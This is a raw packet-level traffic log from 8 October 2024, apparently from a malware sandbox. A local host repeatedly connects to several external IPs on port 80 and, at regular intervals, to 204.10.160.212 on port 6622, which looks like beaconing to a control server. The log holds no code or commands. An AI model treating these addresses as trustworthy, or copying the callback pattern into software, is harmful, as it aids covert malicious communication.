                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.427201033 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.478846073 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.484122992 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.028336048 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.198111057 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.198237896 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.201081038 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.201081038 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.206219912 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.206456900 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.270473957 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.275646925 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.275724888 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.278965950 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.278985977 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.284296989 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.284689903 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.548922062 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.548989058 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.549045086 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.554457903 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009445906 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009666920 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009875059 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.009937048 CEST5021780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.015559912 CEST805021754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.114746094 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.119738102 CEST662250218204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.119860888 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.123945951 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.128792048 CEST662250218204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.377000093 CEST5021980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.382852077 CEST805021954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.382920980 CEST5021980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.383163929 CEST5021980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.383183956 CEST5021980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.388171911 CEST805021954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.388286114 CEST805021954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.136745930 CEST805021954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.137236118 CEST805021954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.137307882 CEST5021980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.137417078 CEST5021980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.142460108 CEST805021954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.621315956 CEST662250218204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.621390104 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.621484995 CEST502186622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.626507998 CEST662250218204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.639405012 CEST5022080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.644644976 CEST805022044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.646388054 CEST5022080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.656341076 CEST5022080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.656367064 CEST5022080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.661814928 CEST805022044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.661917925 CEST805022044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.131769896 CEST805022044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.131941080 CEST5022080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.132227898 CEST805022044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.132601976 CEST5022080192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.137379885 CEST805022044.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.176944017 CEST502216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.182142019 CEST662250221204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.182672024 CEST502216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.186412096 CEST502216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.191643953 CEST662250221204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.231892109 CEST5022280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.237060070 CEST805022218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.237242937 CEST5022280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.237633944 CEST5022280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.237633944 CEST5022280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.242712021 CEST805022218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.242726088 CEST805022218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.688155890 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.688416958 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.688642025 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.688720942 CEST5021680192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.693623066 CEST805021618.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.704761982 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.710201979 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.710685015 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.710834980 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.710859060 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.715820074 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.716260910 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.723685026 CEST805022218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.723907948 CEST5022280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.724030018 CEST805022218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.724109888 CEST5022280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.729001999 CEST805022218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.834777117 CEST5022480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.839715958 CEST805022444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.839782953 CEST5022480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.840004921 CEST5022480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.840032101 CEST5022480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.844866991 CEST805022444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.845371962 CEST805022444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.306371927 CEST805022444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.306529999 CEST5022480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.306847095 CEST805022444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.307066917 CEST5022480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.311687946 CEST805022444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.461787939 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.467180014 CEST805022572.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.467343092 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.467423916 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.467446089 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.472915888 CEST805022572.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.473139048 CEST805022572.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.698008060 CEST662250221204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.698072910 CEST502216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.698126078 CEST502216622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.703541040 CEST662250221204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.013509035 CEST805022572.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.014714003 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.051377058 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.051455975 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.053347111 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.060718060 CEST5022580192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.067496061 CEST805022572.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.231250048 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.231508017 CEST5022380192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.237140894 CEST662250226204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.237535000 CEST805022347.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.237622976 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.241349936 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.246637106 CEST662250226204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.279010057 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.284225941 CEST805022772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.284347057 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.318603039 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.318914890 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.323676109 CEST805022772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.323878050 CEST805022772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.411082029 CEST5022780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.456790924 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462208986 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462296009 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462404013 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.462476015 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.468080997 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.468430996 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.694133043 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699451923 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699525118 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699794054 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.699794054 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.705620050 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.705636978 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.948937893 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.949117899 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.949863911 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.950140953 CEST5022880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.954197884 CEST805022818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.971407890 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977345943 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977556944 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977813005 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.977813005 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.983537912 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.983721018 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159442902 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159802914 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159849882 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.159849882 CEST5022980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.164979935 CEST805022944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.285942078 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.291174889 CEST805023118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.293395996 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.293395996 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.293451071 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.298607111 CEST805023118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.298674107 CEST805023118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.699229956 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.699625015 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.699881077 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.700095892 CEST5023080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.705144882 CEST662250226204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.705202103 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.705238104 CEST805023054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.705270052 CEST502266622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.710621119 CEST662250226204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.719597101 CEST5023280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.724479914 CEST805023244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.724574089 CEST5023280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.724845886 CEST5023280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.724961042 CEST5023280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.729799032 CEST805023244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.729984045 CEST805023244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.207895041 CEST805023244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.208167076 CEST805023244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.208277941 CEST5023280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.208375931 CEST5023280192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.213354111 CEST805023244.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.223660946 CEST502336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.229013920 CEST662250233204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.229119062 CEST502336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.233144045 CEST502336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.238130093 CEST662250233204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.413510084 CEST5023480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.418591976 CEST805023418.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.418704033 CEST5023480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.418847084 CEST5023480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.418863058 CEST5023480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.423811913 CEST805023418.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.423841953 CEST805023418.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.650362968 CEST805023118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.650789976 CEST805023118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.650947094 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.651017904 CEST5023180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.656429052 CEST805023118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.841921091 CEST5023580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.847049952 CEST805023518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.847124100 CEST5023580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.847309113 CEST5023580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.847498894 CEST5023580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.852637053 CEST805023518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.852750063 CEST805023518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.316570997 CEST805023518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.317018032 CEST805023518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.317101955 CEST5023580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.317267895 CEST5023580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.322304964 CEST805023518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.459371090 CEST5023680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.464437008 CEST8050236172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.465815067 CEST5023680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.466146946 CEST5023680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.466167927 CEST5023680192.168.2.4172.234.222.138
